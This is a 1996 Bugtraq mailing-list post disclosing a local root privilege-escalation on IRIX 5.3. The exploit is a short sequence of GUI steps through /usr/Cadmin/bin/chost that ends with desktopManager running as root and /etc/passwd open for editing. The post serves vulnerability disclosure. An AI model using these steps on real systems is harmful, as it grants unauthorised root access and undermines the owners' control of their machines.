Bugtraq mailing list archives

problems in /usr/Cadmin/bin for IRIX 5.3: EXPLOIT


From: gkaufman () cs uct ac za (Grant Kaufmann)
Date: Tue, 6 Aug 1996 14:45:10 +0200


As promised, the exploit for chost under IRIX 5.3. If someone
can verify any other versions of IRIX; 4.0.5F is not vulnerable.

--------
/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager running
as root. Try editing /etc/passwd
--------

--
Grant
--
http://www.cs.uct.ac.za/~gkaufman/pgp.html



Current thread: